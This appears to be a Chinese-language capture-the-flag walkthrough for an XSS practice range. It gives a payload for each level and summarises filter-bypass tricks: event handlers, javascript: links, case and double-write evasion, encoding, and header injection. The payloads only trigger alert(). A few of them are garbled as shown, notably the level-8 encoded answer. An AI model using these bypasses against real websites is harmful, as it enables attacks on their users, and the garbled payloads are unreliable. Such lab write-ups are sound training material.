靶场地址:http://xss.fbisb.com/
参考的文章:https://www.cnblogs.com/cute-puli/p/10834954.html 感谢大佬的分享
做这个题的思路就是 上来直接找输入点或者交互的地方,直接输 <script>alert("xss")</script> 别管他返回什么,直接右键查看源代码 看看 刚才输入的,哪些被过滤了,然后再重新构造 ,重新输入
第一关:pass 答案 <script>alert("xss")<script/>
第二关:pass 答案 <script>alert("xss")<script/>
第三关:以前打通关了一次这个靶场,没想到刚到第三关就卡住,哎,水平还是不行,多努力吧。想到了用 javascript:alert(1) 代替 alert("xss") 但是看到尖括号 < > 被过滤了,第一想到的是用 base64 和 HTML实体编码下绕过,,,行不通,,,最后想起有几个 on*** 开头的函数,可以进行间接弹窗 ,遂查看了解析 ,,,做了出来onmouseover这个函数具体功能我也没看,翻译过来大概就行 当光标移动到图片上的时候就会执行函数 答案 ' onmouseover= ' javascript:alert(1)
第四关: 和第三关差不多, 答案 : " onmouseover= " javascript:alert(1) 或者 " oninput='alert(1)'
第五关: 又是一种新奇的,构造 超链接 答案 " /> <a href = "javascript:alert(1)"> sss
第六关:只能说脑子不够灵活,其实还是不够细心,前几关想到了用大小写绕过,不过没用,到这关就没想起来再用大小写绕过试试 答案 " /> <a hrEf = "javascript:alert(1)"> sss
第七关:双写绕过,答案 :" /> <a hrhrefef = "javascrscriptipt:alert(1)"> sss
第八关:这里又卡了一下,应该是编码绕过,没有想到,只想到了用 双写和大小写绕过..... 只需要编码javascript中的其中一个字母就可以,这里使用的是Unicode编码将 t 转换为 t
答案 : " javascript:alert(1) "
第九关:这关确实有点神奇,查看代码之后发现要求必须是 url 格式,但是不知道为啥,必须得把网站放在中间,若是这样就不行
javascript:%0dalert(1)%0dhttp://www.baidu.com%0d, 答案 javascript:%0dhttp://www.baidu.com%0dalert(1)%0d %0d 指的是 url编码中的空格
第十关:这关难度就稍微有点上来,这才是xss该有的样子。这关需要两点,查看源代码之后,首先需要覆盖 hidden 属性,让我们输入的信息能够显示出来,并且构造 函数触发弹框
答案 :11111&t_sort= xxxxx" type="text" onclick="alert(1)"
第十一关:先用 sss&t_sort=sss&t_history=rrr&t_link=ppppp 看看输入的值是哪个 input 接受的,确定之后,怎么构造都不成功,查看教程之后发现。。。这关是通过更改 第十关的refer,再refer中构造代码进行触发弹框 答案:23&t_sort="type="text" onclick="alert(1) 抄的别人的
第十二关:同理第十一关,第十二关是更改 user—agent
第十三关:同理,前两关,修改cookie进行注入
第十四关:本关因iframe调用的文件地址失效,无法进行测试。要考的应该是通过修改iframe调用的文件来实现xss注入
第十五关:查看代码才能知道是文件包含漏洞,答案 :level15.php?src='level1.php?name=<script>alert(1)</script>'
第十六关:这里就略有些难度了,连交互点都没有,难点在于需要自己构造输入点 答案:/level16.php?keyword=<a%0Atype="text"%0Aonclick="alert(1)">
第十七关:补充:SWF是一种基于矢量的Flash动画文件格式,一般用FLASH软件创作并生成SWF文件格式,也可以通过相应软件将PDF等类型转换为SWF格式 <火狐浏览器会禁用flash,IE和chrome均可>
答案 :/level17.php?arg01=q&arg02=%20onmouseover=alert(11111) onmouseover 前面必须有个空格!!!
第十八关:和第十七关一样,注意,要用IE或者火狐浏览器,答案 level18.php?arg01=a&arg02=%20%20%20onmouseover=alert(1)
剩下的关卡不会做。。。
总结:
XSS测试步骤:
1.检测输入变量,确认每个web页面中用户可自定义的变量,如HTTP参数、POST数据、隐藏表单字段值、预定义的radio值或HTTP头中的内容(refer,cookie等等)
2.分别确认每个输入变量是否存在xss漏洞。变量输入处输入poc,查看返回的web页面的html中poc代码是否被过滤,浏览器是否响应poc,若存在过滤,进行测试查看能否进行绕过。
XSS绕过总结:
xss绕过基本上就是,使用其他函数绕过,大小写绕过,双写绕过,超链接跳转绕过,编码绕过
1.如果过滤了 <> 首先想到用 javascript:alert(1) , onmouseover=alert(1) , onclick=alert(1) 这些进行替代(还有不少以 on 开头的函数可以替代,具体可以百度)
2.如果过滤了Script ,可以尝试进行大小写替换(ScRiPt),进行双写绕过(scrscriptipt),进行编码绕过(只对其中的一个字母进行编码即可,HTML编码或者Unicode编码都可以,这里对 t 字母进行 unicode 编码 ,script 编码之后为 script )
3.可以尝试进行 <a href = "">sss 构造 名称为 sss 的超链接 进行跳转弹框绕过
4.如果过滤了 “ 双引号 或者 ‘ 单引号 ,可以用 javascript:alert(1) 或者 <script>alert(1)</script> 进行绕过
补充:
1.javascript支持unicode、escapes、十六进制、八进制等编码形式。
2.利用事件处理函数,触发事件,执行xss代码。例如<img src='#' onerror=alert(/xss/)>,当浏览器响应页面时,找不到图片的地址,触发onerror事件。
3.3.利用javascript在引号中只用分号分隔单词或强制语句结束,用换行符忽略分号强制结束一个完整语句,而忽略回车、空格、tab等键,绕过对javascript的关键字的过滤。
4.<script>eval("alert('1')")</script> 用eval() 函数也可以进行弹窗